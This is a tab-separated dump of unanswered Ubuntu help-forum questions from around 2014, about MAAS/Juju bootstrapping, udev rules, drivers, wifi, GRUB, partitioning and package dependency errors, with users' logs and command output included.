466477	how to reset maas 1.5 , lts 14.04 setting	i 've been experimenting with maas , following https : //insights.ubuntu.com/2013/11/15/interested-in-maas-and-juju-heres-how-to-try-it-in-a-vm/ , using 14.04 . i must done something wrong , as i am not able to bootstrap maas environment . here is the relevant portion of my environment.yaml : maas : type : maas # maas-server specifies the location of the maas server . it must # specify the base path . # maas-server : 'http : //10.0.0.10/maas/' # maas-oauth holds the oauth credentials from maas . # maas-oauth : 'xxxxx ... xxxxxx' admin-secret : '123456' default-series : 'trusty' the target node is in ready state , as indicated in maas web gui , and i am able to ssh to it , ssh ubuntu @ 10.0.0.31 . however , bootstrap gets stuck during login to the target node : 2014-05-15 16:36:43 info juju.cmd supercommand.go:297 running juju-1.18.1-trusty-amd64 [ gc ] 2014-05-15 16:36:43 warning juju.cmd.juju common.go:40 ignoring environments.yaml : using bootstrap config in file `` /home/navesta/.juju/environments/maas.jenv '' 2014-05-15 16:36:43 debug juju.environs open.go:86 configforname found bootstrap config map [ string ] interface { } { `` bootstrap-addresses-delay '' :10 , `` ca-cert '' : '' -- -- -begin certificate -- -- -\nmiicwtccacsgawibagibadalbgkqhkig9w0baquwqjenmasga1uechmeanvqdtex\nmc8ga1ueawwoanvqds1nzw5lcmf0zwqgq0egzm9yigvudmlyb25tzw50icjtywf ... 2014-05-15 16:36:49 debug juju.provider.maas environ.go:311 maas user data ; 1315 bytes 2014-05-15 16:36:50 debug juju.provider.maas environ.go:317 started instance `` /maas/api/1.0/nodes/node-2ce27bec-dba9-11e3-940c-525400bba9bf/ '' - /maas/api/1.0/nodes/node-2ce27bec-dba9-11e3-940c-525400bba9bf/ 2014-05-15 16:36:50 debug juju.environs.bootstrap state.go:41 putting `` provider-state '' to bootstrap storage *maas.maasstorage waiting for address attempting to connect to hbby7.maas:22 attempting to connect to 10.0.0.31:22 2014-05-15 16:36:50 debug juju.utils.ssh ssh_openssh.go:122 running : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/navesta/.juju/ssh/juju_id_rsa -i /home/navesta/.ssh/id_rsa ubuntu @ hbby7.maas /bin/bash 2014-05-15 16:36:50 debug juju.utils.ssh ssh_openssh.go:122 running : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/navesta/.juju/ssh/juju_id_rsa -i /home/navesta/.ssh/id_rsa ubuntu @ 10.0.0.31 /bin/bash 2014-05-15 16:36:55 debug juju.utils.ssh ssh_openssh.go:122 running : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/navesta/.juju/ssh/juju_id_rsa -i /home/navesta/.ssh/id_rsa ubuntu @ hbby7.maas /bin/bash another symptom of my problem is that while my target node is in ready state , it will shut down upon restart . to avoid this problem , i have to put it in allocated mode and restart it . i have tried removing , re-commissioning and destroying the mass environment , to no avail . ( also followed , reset maas after loosing juju configuration ? , but apis seems to have changed . ) any hint or thought is appreciated . cheers ,
466480	trying to create udev rule to mount removable drive exfat partition	so i am trying to create a udev rule to automatically mount a drives exfat partition to /media/offsite . my goal is to automatically mount a drive to /media/offsite and then kick off a .sh script to copy files around . i have been reading many guides and have learned a lot , but i am still getting stuck . many of the guides are very outdated and apply to usb drives where as i have a docked drive . just to see if a rule would trigger , i created this rule in /etc/udev/rules.d/80-external-disk.rules : action== '' add '' , env { devtype } == '' partition '' , env { id_fs_uuid } == '' 5359-818e '' , run+= '' /bin/mount -t exfat -u $ env { id_fs_uuid } '' i reloaded rules , rebooted server , few other things , and it appeared the rule was n't firing . udevadm test $ ( udevadm info -q path -n /dev/sdb ) 2 > & 1 | grep /etc/udev/rules.d that only produces the following ; parse_file : reading '/etc/udev/rules.d/70-persistent-cd.rules ' as rules file parse_file : reading '/etc/udev/rules.d/70-persistent-net.rules ' as rules file parse_file : reading '/etc/udev/rules.d/80-external-disk.rules ' as rules file my thought is that the uuid belongs to the partition and not the drive . with the partition being an exfat , can udev even see that uuid ?
466486	radeon driver issue	i have a mobility radeon hd 4200 series card ( one of those cpu/gpu systems ) . when i try to run a game i en up with libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/r600_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/r600_dri.so libgl error : failed to open drm device : permission denied libgl error : failed to load driver : r600 ... renderer : gallium 0.4 on llvmpipe ( llvm 0x301 ) ( vmware , inc. ) driver : 2.1 mesa 9.0.3 glsl : 1.20 rendering using the opengl glsl shader path . so i ran it under superuser just to make sure i can read the files , idk what this llvmpipe is . this got me to the right driver : renderer : gallium 0.4 on amd rs880 ( x.org ) driver : 2.1 mesa 9.0.3 glsl : 1.30 all this does is crash with no errors that show up . i am just using the drivers on the system , since i read it comes with the open source version and my card ( whatever u call it ) is legacy so i dont think i can upgrade to ati drivers .
466488	what does `` unknown code ovk 48 '' mean ?	when i log in after update from 13.10 to 14.04 , lightdm and gdm display unknown code ovk 48 , i can log in without problems ( lightdm requires that i press return after the message is displayed ) . sometimes unknown code ovk 0 is displayed . what does it mean ? do i have to do something ( i guess i 'd ask a separate question how to do that , for instance i only want to know what it means ) ?
466490	maas deployment bridging	i have a simple setup with one maas server that contains 2 nics , one public and one for maas subnet , and a target pxe boot with a single nic , which is connected to maas subnet . during pxe boot , target gets as far as `` generation complete '' ; however , it is not able to access any repository , i.e. , on the target 's console , the following is observed : generation complete ign http : security.ubuntu.com trusty-security inrelease ... err http : security.ubuntu.com trusty-security release.gpg connection failed get : 1 http : archive.ubunut.com trusty-updates release.pgp [ 933 b ] ign http : archive.ubunut.com trusty-updates release do i need to manually bridge the 2 nics on the maas server , or there is another problem ? cheers ,
466498	will installation of *bsd break my ubuntu ? and what about swap and bootloader mess up ?	i have windows 8 on my hdd ( with it 's system and boot partition ) , an extended partition ( d under windows ) from which i extended 2 more partitions - the one for ubuntu ( which is primary ) and one for swap . if i extend some more space and use it to install *bsd there , will it mess up with win/ubuntu , can i use same swap partition for both ubuntu and *bsd , and what will happen with the bootloader ? can i skip installing bootloader during installation on *bsd and will grub automatically find *bsd after it 's installation ?
466499	provisioning a standalone ubuntu into maas	is it possible to provision a target node that boots on its own , i.e. , not through typical pxe boot ? ( target node is preloaded with either 12.04 or 14.04 ) cheers ,
466500	kbuntu desktop installation language	i have installed ubuntu 12.04lts ( spanish ) and i installed kbuntu-desktop , but the installer make it in english ( american ) , is there any way to use kde in spanish ?
466502	different output between network tool 3.8.1 and terminal traceroute	network 3.8.1 constantly gives a different output than running traceroute command from terminal . also the outcome remains different while using different isp . no changes in pc interfaces other than changing usb from different providers . uname -a : 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux is it possible that the pc has two different active interfaces / routes running at the same time . route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1 ip route ls : default via 192.168.1.1 dev eth1 proto static 192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.100 metric 1
466503	why does intel graphics installer depend on ttf-ancient-fonts ?	i just tried installing intel ( r ) graphics installer 1.0.5 for linux* from https : //01.org/linuxgraphics/downloads and it installed ttf-ancient-fonts . any ideas on why do they need it ? related forum topic is https : //01.org/linuxgraphics/node/331 but i do n't want to register there yet .
466508	installing xfce versus xubuntu-desktop	a few questions . first , what 's the difference between installing xfce vs xubuntu-desktop ? i mean i know xubuntu is ubuntu with xfce but what exactly is the difference between installing the aforementioned ? is one better than the other ? next , does installing multiple desktop environments slow down your computer ? i have a netbook with 4gb of ram . and last , how do you set the default desktop environment ? thanks !
466512	everything on desktop disappeared except background image	linux/ubuntu was installed when i bought the computer nearly 6 yrs ago ; i no longer have the disk . a couple of weeks ago , everything on the desktop vanished except the background image . the folders i had on desktop , task/tool bars , start menu , etc . = no longer there . i do n't know whether i accidentally hit a key that caused it all to vanish , or it did it by itself , but i do n't know how to bring it back . are there any keyboard shortcuts that could restore everything ? info/advice would be greatly appreciated- but please do n't use tech terms .
466514	update manager showing some softwares having .exe format !	today i was updating my softwares via update manger . after completing the downloads , while these softwares were installing , i 've found that some softwares have .exe format ! i ca n't figure this out ! can somebody explain me what is actually happening here ? ? ?
466516	how to get my xbox 360 joypad to work in 14.04 ?	i have a third party wired xbox 360 joypad that i am trying to us for emulators . how do i get this thing to work ?
466517	black screen after booting from grub	i recently installed ubuntu and it recently started going to a black screen after booting . i have a dual boot with windows , so after choosing ubuntu from the grub menu , the screen goes black and nothing happens . the keyboard and mouse are still operational , because moving or clicking them wake the monitor up when it has gone into hibernation mode ( separate monitor , this is n't a laptop ) . i 've tried the nomodeset option , but that does n't seem to do anything . has anyone had this problem or is able to help ? thanks in advance
466521	xubuntu 14.04 : missing settings apps in whisker menu	i 'm using xubuntu 14.04 with the whisker menu . when i 'm searching a setting application ( like gparted , usb creator ... ) that app is missing in the main menu . i have to go to settings window and run from there . could i change this behavior and show all the applications in the main menu ? fyi this is a fresh install in 2 computers . thanks in advance !
466522	how to install draftsight on ubuntu 64bits ?	i downloaded the deb file to install draftsight but trying to install the package using dpkg failed with the following error : the installation or removal of a software package failed . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 196655 files and directories currently installed . ) preparing to unpack ... /downloads/draftsight.deb ... access control disabled , clients can connect from any host /var/lib/dpkg/tmp.ci/showlicense : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory access control enabled , only authorized clients can connect dpkg : error processing archive /home/helios/downloads/draftsight.deb ( -- install ) : subprocess new pre-installation script returned error exit status 127 errors were encountered while processing : what missing packages do i need to install to properly run draftsight ?
466523	help setting up a home media + file server	okay , here is the thing - i want to set up a media + file server for my home ... i have a tp-link wifi router+modem . i plan to use xbmc as the media server ... i tried it out and i can now use it.. but , i have problems in the following - how to use the same server as a file server ? i installed vsftpd but i cant understand how to use it from a remote ubuntu , android and windows machine ... is there any other software like xbmc for file server access apart from filezilla ... filezilla is fine but i would like to know if there is anything as simple to use as a file manager to access the files on the server ... i do use the ubuntu filemanager to access ftp server set up on my phone to access the phone but i cant seem to figure out how to use such a thing where i can just access a location in my network on ubuntu , android , windows pcs ... also , i cant figure out how to remotely upload files on the server for use through xbmc ( like movies etc ... i guess that shall also be done with ftp..but just asking if there is any other way ) .. access from outside the wifi network is not a priority at first though it would be a thing to add later for sure ( guess it needs port forwarding on the router ... : / ) hope my question is understandable ... thankyou ...
466528	changing ubuntu version	so , my friend lent me his ubuntu 12.10 boot cd , and it 's the 64-bit version , but my processor is 32-bit . so , after installing , i was wondering if there 's a way to install 14.04 32-bit from inside the system itself . thanks !
466536	ubuntu tries to install to the wrong parition	i 'm trying to dual boot windows 7 and ubuntu from a dell laptop . going through the regular install process , i got to the point where it asked me if i wanted to install alongside my windows partition ( i did ) . what 's strange is i have a 1 terabyte hard drive . after some investigation , i have three partitions : dellutility - 104mb , it appears to be some preinstalled recovery tools or something of that sort recovery - 15gb ( 8gb used ) , this appears to be the standard recovery partition for when windows is broken os - ~930gb ( the rest of the drive ) - this is the partition with my windows install and all of my files in it . naturally , i want to install ubuntu in ~150gb of the os partition , but for some reason the ubuntu installer tries to install within the 15gb partition . i did some research and saw that gpt can mess up the install , so i ran gdisk and got the following output : it seems to be conflicting : do i have only mbr or a broken gpt like it says ? i 'd appreciate some advice on how to proceed . i do n't have much experience with messing around with partitions and can not break my windows install .
466539	questions about setting up ssl	i have a subdomain on a server that is pointing to an ip hosting an application . i need to enable ssl on the application . the way i understand it is that because ssl is domain specific the application box does n't need to have an ssl cert on it . my question is how do i enable ssl on my application box and use the domain server 's certificates ? is this possible or do i need to setup an ssl certificate on the application box ? thanks
466540	kerio vpn client removing problem	i have installed kerio vpn client from it 's debian file but it did n't finish its installing process and software center was frozen until i force quite it . and now i can not update or install anything because first it goes to kerio vpn client ... . and want to finish it first but it freezes . i have tried installing synaptic package manager to find a way to remove it , but software center freeze on installing it because of it . my ubuntu desktop is totally useless right now . any suggestion how to remove it ? i 'm using ubuntu 64 bit 14.04 .
466543	no screen found in amd	i have problem and my computer is 64 bit it was running good after restart i dont know whats wrong ? if anyone can help please .. when i write startx fatal server error : ( ee ) no screen found ( ee ) ( ee ) please consult the x.org foundation support at http : wiki.x.org for help ( ee ) please also check the log file at /var/log/xorg.o.log for additinoal information ( ee ) ( ee ) server terminated with error ( 1 ) . closing log file xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error
466544	decrease skype icon in xubuntu tray	hello i am using xubuntu 14.04 . and skype in my tray looks like this : in 13.10 icon looks well : is it possible to decrease size of it ? thanks .
466546	unmet package dependencies after unfinished upgrade	since one week i am trying to solve this problem but no success . after a restart during a dist-upgrade , i got the `` unmet dependencies ... '' error . this the result of sudo apt-get install maas ( does not work at all not only for maas ) some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libasound2 : breaks : libasound2-plugins ( < 1.0.24 ) but 1.0.22-0ubuntu6 is to be installed libc6-dev : breaks : pkg-config ( < 0.26-1 ) but 0.22-1build2 is to be installed libglib2.0-0 : breaks : gnome-control-center ( < 1:3 ) but 1:2.30.1-0ubuntu2 is to be installed breaks : gvfs ( < 1.8 ) but 1.6.1-0ubuntu1build1 is to be installed libpango1.0-0 : breaks : plymouth ( < 0.8.2-2ubuntu19 ) but 0.8.2-2ubuntu2.2 is to be installed ppp : breaks : network-manager ( < = 0.8.0.999-1 ) but 0.8-0ubuntu3.3 is to be installed breaks : network-manager-pptp ( < = 0.8.0.999-1 ) but 0.8-0ubuntu3 is to be installed e : broken packages
466549	bash : /home/user/.ssh/authorized_keys : no such file or directory	create a ssh key : command : ssh-keygen -t rsa âp `` '' moving the key to authorized key : command : cat $ home/.ssh/id_rsa.pub > > $ home/.ssh/authorized_keys bash : /home/user/.ssh/authorized_keys : no such file or directory
466551	ubuntu 12.04.04 lts xfs xlog_space_left	i am running kernel : 3.2.0-59-generic will moving to 3.2.0-61-generic fix the issue with xlog_space_left : head behind tail ? i do a serious amount of lvsnap shots every hour on a mysql database on a solid state drive . the xfs is on top of lvm . which then i mount the snapshot to rsync to another server . should i run an xfs_check ? or reboot and will it fix it ? or should i patch the os to the latest version of the kernel ? these are the mount options for the xfs file system i am using : /etc/fstab < file > /dev/mapper/sysvolgroup-lvdb /db xfs inode64 , noatime , discard 0 2 should i keep these mount options or should i use something different for ssd drives i am using .
466557	got an error message when trying to use winusb concerning the amount of recognized spaced on the usb	a few days ago i formatted a usb and installed memtest86 image on it using sudo dd if=memtest86-usb.img of=/dev/sdb . i ran the memtest86 usb on an early 2008 macbook and it seemed to work right but when i booted back up to my hdd running only ubuntu 14.04 with the macbuntu 14.04 theme ( the lock screen did n't disappear though which might have caused the following problem ) , i got a tick-tick-tick noise which probably meant there was abnormal read write activity . after running i formatted it again but ubuntu keeps calling it 51mb volume . and when i formatted ( basic ) using disks on 14.04 and tried to install windows 8.1 iso on the usb i got an error message that said , installation failed ! exit code : 256 log : formating device ... error : the backup gpt table is not at the end of the disk , as it should be . this might mean that another operating system believes the disk is smaller . fix , by moving the backup to the end ( and removing the old backup ) ? warning : not all of the space available to /dev/sdb appears to be used , you can fix the gpt to use all of the space ( an extra 7655424 blocks ) or continue with the current setting ? warning : not all of the space available to /dev/sdb appears to be used , you can fix the gpt to use all of the space ( an extra 7655424 blocks ) or continue with the current setting ? warning : not all of the space available to /dev/sdb appears to be used , you can fix the gpt to use all of the space ( an extra 7655424 blocks ) or continue with the current setting ? error : you requested a partition from 1000kb to 4077mb . the closest location we can manage is 17.4kb to 157mb . my questions : 1 ) why was ubuntu calling it the 51mb volume ? 2 ) why was i getting that incessant tick-tick-tick noise ? 3 ) how do i fix my usb so that i can use it with winusb ? 4 ) ( if possible ) how do i fix the macbuntu 14.04 lock screen problem ? thanks for reading and please reply .
466559	wireless is disabled by hardware switch . wifi does n't work ! ( hard blocked : yes , soft blocked : no , hp pavillion g6 2237 , ubuntu 12.04 ) ?	i dual installed ubuntu 12.04 alongside windows 8 with dual boot option . wireless disabled by hardware switch . how to turn on the wifi ? i tried following commands . gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 13ba:0017 unknown ps/2 keyboard+mouse adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 1bcf:2c1e sunplus innovation technology inc. > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ lspci > 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) > 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) > 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) > 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) > 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) > 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) > 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) > 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) > 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) > 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) > 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) > 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) > 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) > 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] > 07:00.0 network controller : ralink corp. device 3290 > 07:00.1 bluetooth : ralink corp. device 3298 > 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) > 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ sudo rfkill unblock all > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ rfkill list all > 0 : phy0 : wireless lan > soft blocked : no > hard blocked : yes wireless card 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie
466560	what is evolution reliability ? when can i expect solution of its `` freezing '' ?	the evolution 3.2.3 program in my fully updated ubuntu 12.04 occasionally `` freezes '' and i need to restart the pc . sometimes it happens when i quickly move to further ( 'work ' , but 7 day ) weeks or months , without ( long ) waiting while all appointments appear ; usually an internal ubuntu error is simultaneously announced and a report sent automatically . up to now no data have been lost ; it would be fatal , because i begin to organize all my activity by the evolution program instead of the microsoft outlook 2003 with windows xp used before . i backup whole evolution content ( and , at the same time , settings , which is not pleasant for me ) every several days as i was used to do with the outlook . up to now i also backup every important new mail , contact and appointment at once in separate files *.mbox , *.vcf or *.ics ; of course i wish not doing it . should i abandon the immediate backuping ? i hope the `` freezing '' will be corrected by ubuntu updates . when can i expect it ? i suggest creating a tag 'reliability ' .
466563	stuck on intro to linux lab ubuntu 10.04	i am currently in an intro to linux class . we are using ubuntu 10.04 and i am stuck on a lab problem . here are the instructions : create a script called get_dirs that lists the directories in a directory , trims off any extra characters , and stores the data in a file called current_dirs . run the script and verify the output . make an alias for this command called gd . check that the alias works then logout and log back in . check to see if the alias is still valid it is an online class and my instructor is currently unavailable . up until this point in class i 've been doing well but i ca n't figure out how to complete the directions in the first sentence .
466565	installed lubuntu 14.04 on an acer aspire 5517 and ca n't connect to wireless	$ iwconfig lo no wireless extensions . eth0 no wireless extensions . $ ifconfig -a eth0 link encap : ethernet hwaddr 70:5a : b6:08 : b3:21 inet addr:192.168.1.25 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :725a : b6ff : fe08 : b321/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15337 errors:0 dropped:0 overruns:0 frame:0 tx packets:11030 errors:0 dropped:0 overruns:0 carrier:5 collisions:0 txqueuelen:1000 rx bytes:8673692 ( 8.6 mb ) tx bytes:1339434 ( 1.3 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8288 errors:0 dropped:0 overruns:0 frame:0 tx packets:8288 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:787813 ( 787.8 kb ) tx bytes:787813 ( 787.8 kb ) but lspci sees the broadcom device : $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] rs780 host bridge 00:01.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:05.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 1 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 3c ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs780m [ mobility radeon hd 3200 ] 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 08:00.0 ethernet controller : qualcomm atheros ar8132 fast ethernet ( rev c0 ) how can i fix this ?
466566	delete user changes after the end of a session	in my university 's labs ( running ubuntu 14.04 ) i have noticed that some people like to make quite a lot of changes - visual and config . i personally think that everyone should be able to work with a configuration which they like and feel comfortable with , so i started wondering if there is a way when there are certain settings set for a user , when you log in , you can edit everything you wish and once you log out , all the changes are reverted ? i think such a thing will fit the university 's needs quite awesomely and i am not sure if they have n't done it out of lazyness or because it is impossible
466568	automatically being logged out in lubuntu ( openbox )	i get automatically logged-out every now and then of my pc . i use lubuntu 14.04 , which has openbox , lxde . i did n't installed neither openbox nor lxde by myself . it happens when i turn-off the wifi , but also at other times . i am not sure if it 's a log-out or just something like xorg crashing and being re-started . how can i diagnose and repair this problem ? would this solution work and what consequences would it have ? from my ubuntu randomly automatically logout after installing openbox : $ sudo apt-get remove apport update-manager update-manager-core
466569	kubuntu 14.04 install crashes when reaching grub	i 've been trying to install kubuntu 14.04 on my desktop pc alongside my windows 7 ( i want to make a dual boot system ) , but the istallation always crashes at the point when the installer tries to set up grub at the end . i have 4 hard drives , two identical drives with 750mb capacity used in raid 0 , one 2tb drive , and a 500mb drive , which contains my windows 7 installation . the latter is partitioned to hold a 300mn ntfs partition for the win7 , and i created a 170mb ext4 partition with `` \ '' as mount point , and the rest ( some 7gb or so ) as a swap partition . the kubuntu would go on the ext4 , but as mentioned above , it crashes at the end of the install . however , when i try to boot my pc , i get a grub > prompt , so the win7 loader is replaced ( i can repair it , that 's no issue ) . at the beginning of the installation the installer asks me if i wanted to download updates during the installation , and 3rd party stuff , but i did n't check in these , because when i do check them in , the installer hangs at the point of configuring some kind of broadcom driver ( i have a wireless pci card in the pc , i guess that causes tis other problem ) . hope i was detailed enough , does anyone have a suggestion for solving this problem ? thanks in advance !
466571	upgrading from 13.10 to 14.04 without losing all files ?	i want to upgrade ubuntu and keep my existing files and apps . is there a way to upgrade from ubuntu 13.10 to ubuntu 14.04 without having to download an iso , put it on a usb and then install it and have it erase all my files and apps ?
466573	system stuck in tty mode	i was stuck at this problem ( though i am still stuck at it ) . i boot in recovery mode and then choose the option `` continue as normal boot '' . then i get stuck in tty mode . when i exit from it ( ctrl+alt+f7 ) , i just go to a blank screen and nothing happens . how do i exit out of it ? as specified in the linked question , i have a lenovo ideapad laptop and i 'm trying to install ubuntu 14.04 .
466579	ubuntu 14 does not shootdown	it has been some time i have installed the last ubuntu . some times , not always , i try to shotdown ubuntu it stops on killing remaining processes ? any one know how to solve this issue ? also i am having this other issue : i change the default font size of system and also here when i reeboot some time it loads the right font size some times it loads with default font size . it seems that it is not keeping the user customization . other issue : i have a epson laser printer and after booting the printer seems to be not connected to the system , but after 10 minutes it comes online ?
466580	network latency	i 'm playing a mud . while playing , the output stops outputting . it will just hang there until i press enter or 4 - 10 seconds passes , then everything pops through and will run smooth until it hangs again . i have no other issues with my net besides this . i originally thought it was my system causing the issue so i switched from ubuntu to xubuntu . loving the new os but this problem is aggravating me to no end . i can ping the website with great results . no real lag issues or anything . it just hangs . any help resolving the issue would be greatly appreciated !
466584	add space to partition	i 'm running ubuntu 12.04 lts server vm with esxi . i added an additional 20 gb to my thick provisioned lazy zero disk , but i 'm not able to resize my current partition . i am booting from a gparted live iso . i would like to merge /dev/sda1 and unallocated , but i do not seem to get the option . does anyone have any suggestions on increasing the size of /dev/sda1 ?
466586	ubuntu file system partition gone unallocated	i decided to install windows 7 next to my ubuntu setup and started to follow this instructions . currently i 'm on the third step . but when i try to mount the file system that i noted down , it says `` mount : special device /dev/sda6/ does not exist '' . here is a picture of the current partitions . since the instructions says that i need to note down the partition name , can i assume that i can still get back what was on my ubuntu file system ? is it possible to make unallocated partition in the image , functional again ? did my whole ubuntu installation got wiped out ? should i try using testdisk to get back the unallocated partition ?
466588	unable to install glabels ; unmet dependencies	when i try to install glabels from the command line , this is what i get : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . glabels : depends : libedataserver-1.2-17 ( > = 3.5.91 ) but it is not installable n : ignoring file 'sedstkguc ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension n : ignoring file 'sedstkguc ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension e : unable to correct problems , you have held broken packages . how do i go about resolving this issue ?
466590	where is the installed kernel source located ?	i have installed kernel source with sudo apt-get install linux-source -y now , where is the source located ?
466591	install mediawiki v1.22.6 on ubuntu 12.04 server cli	can anyone please give me the simplest way to install v1.22.6 mediawiki on ubuntu 12.04 using cli ? i have used apt-get to install 1.15 but it seems apt-get does not have anything more current . assume i am a child you are explaining this to and dumn it down as best as possible please : ) i know very little about linux cmd 's . i have tried to install git , and have tried with curl and wget , none of which work because not one set of instructions i red actually installed media wiki , the latest version or i got a bunch of errors that tell me its an invalide command or the directory does not exist , and so on . please can someone help me ?
466596	wifi not working , upgrade to ubuntu 14.04	i 've upgraded my system with ubuntu 13.10 to 14.04 and then my wifi adapter broadcom bcm43142 [ 14e4:4365 ] is not working and the wireless connection is not even showing up in the list .
466599	14.04 on dell l502x freeze at startup after installing nvidia drivers	first i want to apologise for my bad english . now straight to my problem . : ) after os installation i started installing the drivers for geforce gt540m graphics in my notebook . i chose the recommended nvidia331 drivers by using commands # ubuntu-drivers list # ubuntu-drivers devices # ubuntu-drivers autoinstall after system startup . it start hangs on the loading screen . i tried again to install whole new system and then i 've downloaded the package from nvidia `` nvidia-linux-x86_64-331.67.run '' i stopped gdm service and started to instalation with sh command and received the same result . i sit on this for a few hours and decided to share with you my problem if any of you had a similar problem i'am happy to hear how to resolve it
466600	install on dell e6430 hangs	i 'm trying to install kubuntu 14.04 on a dell latitude e6430 . i 've tried both install from usb and from dvd . the different attempts result in a little different behaviour , but most of the time , i see a `` keyboard = man in a circle '' sign , and then the install hangs . or i can choose 'start kubuntu ' , then a lot of cpu power is used , but the install hangs . not sure if i can provide any more useful information to solve this problem ? thanks .
466601	failed install of 14.04 which has resulted in error : symbol 'grub_term_highlight_colour ' not found	after an attempt to install 14.04 over 13.04 ( which was working fine ) , i have the error msg at start up error : symbol 'grub_term_highlight_color ' not found . grub rescue > i have tried to re-install again once , i can not burn everything and start again . only using ubuntu partition for testing etc ... but can not write over other win7 partition it contains everything and just before i was about to run backup : ( i have booted into the demo mode of 14.04 fine any reason i can not repair from here using suggestions mentioned in other cases ? any suggestions ... .and many thanks in advance : )
